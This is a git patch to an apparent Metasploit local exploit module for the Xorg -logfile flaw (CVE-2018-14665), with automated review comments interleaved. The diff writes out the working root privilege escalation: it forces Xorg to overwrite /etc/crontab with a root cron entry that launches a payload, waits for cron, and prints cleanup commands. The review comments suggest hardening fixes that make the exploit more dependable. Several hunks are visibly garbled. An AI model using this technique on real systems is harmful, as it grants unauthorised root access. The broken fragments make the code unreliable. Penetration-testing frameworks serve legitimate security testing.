From 012c8a450fe3facd92fa6b63a3db923bda8df2b3 Mon Sep 17 00:00:00 2001 From: Aaron Ringo Date: Wed, 7 Nov 2018 12:13:37 -0600 Subject: [PATCH] Feedback from PR work cont. changed loop, formatting errors, options --- .../openbsd/local/xorg_x11_suid_server.rb | 48 +++++++++++-------- 1 file changed, 28 insertions(+), 20 deletions(-) diff --git a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb index eeb4b656f3..acb39c06bd 100644 --- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb +++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb @@ -22,8 +22,9 @@ class MetasploitModule < Msf::Exploit::Local that start the server the ability to elevate privileges and run arbitrary code under root privileges. - This module writes a cron job using the Xorg -logfile option. The job - will run a small script to launch a payload. It has been tested with + This module writes a cron job using the Xorg -logfile option. On write + crontab.old will be created so it must be removed after exploit. Cron + will then run a small script to launch a payload. It has been tested with OpenBSD 6.3,6.4 and CentOS 7. Xorg must have SUID permissions. Success on CentOS depends on the session having console for starting Xorg along with selinux settings, may work but is currently not supported. @@ -43,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ], [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ] ], - 'Platform' => %w(linux unix openbsd), + 'Platform' => %w(unix openbsd), 'Arch' => ARCH_CMD, 'SessionTypes' => 'shell', 'Targets' => 
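Review bot: The new `'Platform' => %w(unix openbsd)` entry drops `linux`, while the description in the hunk above still says the module was tested on CentOS 7, so the metadata and the text now read as contradictory. If Linux hosts are meant to be covered through the `unix` platform and the `ARCH_CMD` payloads, a one-line comment above the entry would make that explicit, for example `# Linux hosts are matched through the unix platform (cmd payloads)`. Otherwise the CentOS sentence in the description should be reworded. The info hash starts and ends outside this hunk.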
@@ -60,10 +61,15 @@ class MetasploitModule < Msf::Exploit::Local 'DefaultTarget' => 0)) register_options( [ - OptString.new('SCRIPT', [ true, 'Dir for crontab script', '/tmp/' ]), OptString.new('PAYLOAD_LOC', [ true, 'SUID binary to create', '/usr/local/bin/shell' ]), OptBool.new('BUILTIN', [ true, 'Privesc in current session', true ]) ]) + register_advanced_options( + [ + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]) + ] + ) end @@ -71,20 +77,22 @@ class MetasploitModule < Msf::Exploit::Local xorg_path = cmd_exec("which Xorg") vprint_good 'Xorg path found at #{xorg_path}' + #/dev/null" + cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null" Rex.sleep 5 cmd_exec "pkill Xorg" Rex.sleep 5 - cron_check = cmd_exec "egrep #{pscript} /etc/crontab" + cron_check = cmd_exec "grep -F #{pscript} /etc/crontab" unless cron_check.include? pscript fail_with Failure::NotVulnerable, '/etc/crontab not modified' end print_good '/etc/crontab overwrite successful' - i = 0 - while i < 12 + 12.times do print_status 'Waiting on cron to run' Rex.sleep 10 - i += 1 break if exists? payload_path break unless exists? pscript # will be cleaned up on successful exploit end @@ -164,9 +171,10 @@ class MetasploitModule < Msf::Exploit::Local end else Rex.sleep 2 + # /etc/crontab ; rm -f #{pscript}.*' + print_warning "cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*" print_warning 'rm -f /etc/crontab.old' end end
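Review bot: `WritableDir` and `Xdisplay` are registered as free-form `OptString` values with no format check, and the hunk at -71 interpolates `#{xdisplay}` and `#{pscript}` directly into `cmd_exec` strings. Assuming those locals are derived from these datastore options (the assignment is not visible on this page), a value containing whitespace or shell metacharacters would run a different command on the target than the operator intended. A guard at the top of `exploit`, such as `fail_with Failure::BadConfig, 'Xdisplay must look like :N' unless datastore['Xdisplay'] =~ /\A:\d+\z/`, keeps the command line predictable. The two `register_*` calls also close differently (`])` versus `]` then `)`), so one form should be used for both. `initialize` begins outside the hunk.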
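Review bot: `cmd_exec "grep -F #{pscript} /etc/crontab"` and the `Xorg -fp '... #{pscript}'` line build shell commands by plain interpolation, so a script path containing a space or a quote breaks the check or changes what is executed. Escaping the value, e.g. `cmd_exec "grep -F #{Shellwords.escape(pscript)} /etc/crontab"`, removes that ambiguity. The unchanged context line `vprint_good 'Xorg path found at #{xorg_path}'` is single-quoted and therefore prints the literal `#{xorg_path}`; it should read `vprint_good "Xorg path found at #{xorg_path}"`. Part of this hunk appears to have been lost in extraction (the line starting `+ #`), and the method starts and ends outside the hunk, so this covers only the visible lines.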
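Review bot: The printed restore command `cat #{pscript}.b > /etc/crontab` truncates the system crontab even when `#{pscript}.b` (presumably the backup) no longer exists, because the shell opens the redirect target before `cat` runs. Guarding on the backup is safer: `print_warning "test -s #{pscript}.b && cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*"`. Since this branch only prints commands, the host is restored only if the operator acts on them. A short comment above these lines naming what is left on the host (`/etc/crontab.old`, `#{pscript}.*`, the added `root` cron line) would help whoever audits the machine or writes the engagement report afterwards. The hunk is partly garbled on this page and the enclosing method begins outside it.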